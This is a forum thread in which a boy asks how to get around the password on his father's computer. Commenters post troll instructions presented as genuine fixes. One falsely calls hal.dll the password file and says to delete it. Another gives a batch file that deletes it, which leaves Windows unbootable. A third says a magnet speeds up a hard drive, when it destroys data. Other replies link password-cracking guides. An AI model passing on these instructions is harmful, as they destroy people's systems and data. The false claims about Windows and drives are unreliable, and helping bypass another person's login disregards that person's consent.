Say kid, tell me how old you are and we can predict why you are not allowed on your dads computer.
"He doesn't like when i play with his finance records!"
stop rating people disagree op
Good idea! Maybe you'll find his porn stash!
The reason it got a password on it was because of my little sister, she downloaded a game and it had a trojan, so he put a pass on it, he wont tell me because he thinks ill tell my sister, there isn't anything secret on his computer just some of my files and games which I don't want to transfer.
You don't even need to crack it, there's an easier way to get into it:
1. Install a portable Linux distro on a DVD or USB drive
2. Boot from it by changing the boot order in BIOS while the computer starts
3. Once you're booted into it, navigate your way to the drive containing the Windows installation
4. Go to the "Windows" folder within that drive and find a folder called "system32"
5. Go into this folder and delete "hal.dll", the file that handles password protection on user accounts
6. Boot back into Windows and you should be able to just log into the account. Congratulations, you just hacked Windows!
If you want to make this process faster, you can drag a bar magnet (a powerful one) over the Hard-Drive in one direction a few times. This is what professionals do to speed up your machine. Best of luck OP!

I don't want to delete the password, thats easy, and then he will know I have done it.
It's not deleting the password, it's just disabling the system that makes password protection work.
It will fix itself when you restart the computer again anyway.

Yeah, because his original post was so deserving of help...
He sounded like a 10 year old locked out of his toy room.

You should really listen to this guy, OP, he knows what he's doing.
How would you like it if your dad tried to do the same to your computer?

I wouldn't care?
There is a sligtly easier way to delete hal.dll
Open a text editor.
Type the following code in it.
@echo off
del c:\WINDOWS\system32\hal.dll
Save it as a .bat file.
Run the file.

He can't get into the computer in the first place, so he can't do that. I would've told him to do that instead if it were possible.
Also, do the magnet trick if something goes wrong when the file gets deleted. That fixes it up right away.

He just gotta wait when his dad leaves the pc for a moment(common sense).
Creating the bat file takes about 30 seconds.

Assuming he doesn't lock it or anything when he walks away. Anyway, OP, if you find yourself in a situation where your dad leaves the computer alone and logged in then Wizard's solution works just as well.
White knighting up in this shit. Don't delete hal.dll
http://en.wikipedia.org/wiki/Microsoft_Windows_library_files#Hal.dll
You can try this:
http://lifehacker.com/5504531/the-complete-guide-to-saving-your-windows-system-with-a-thumb-drive
But that will only let you change your password/remove it.
If the password is relatively easy to crack, this may work:
http://lifehacker.com/394039/recover-lost-passwords-with-free-tools
it's really near impossible to guess the password, for example, my password is a single character, but it's not on any kind of keyboard. this is it: │ (not to be confused with this: |)
i could even make mine this:
_▲
▲ ▲
(sorry for meme reference, just an example.)

This man is trying to get you to run viruses on your father's computer, don't listen to him for your own good.
Get away... from the computer.
stay off my god damn computer billy
So looks like its the Linux distro route, but before I do that is there a way that wont get me viruses, that will crack the password and tell me it?
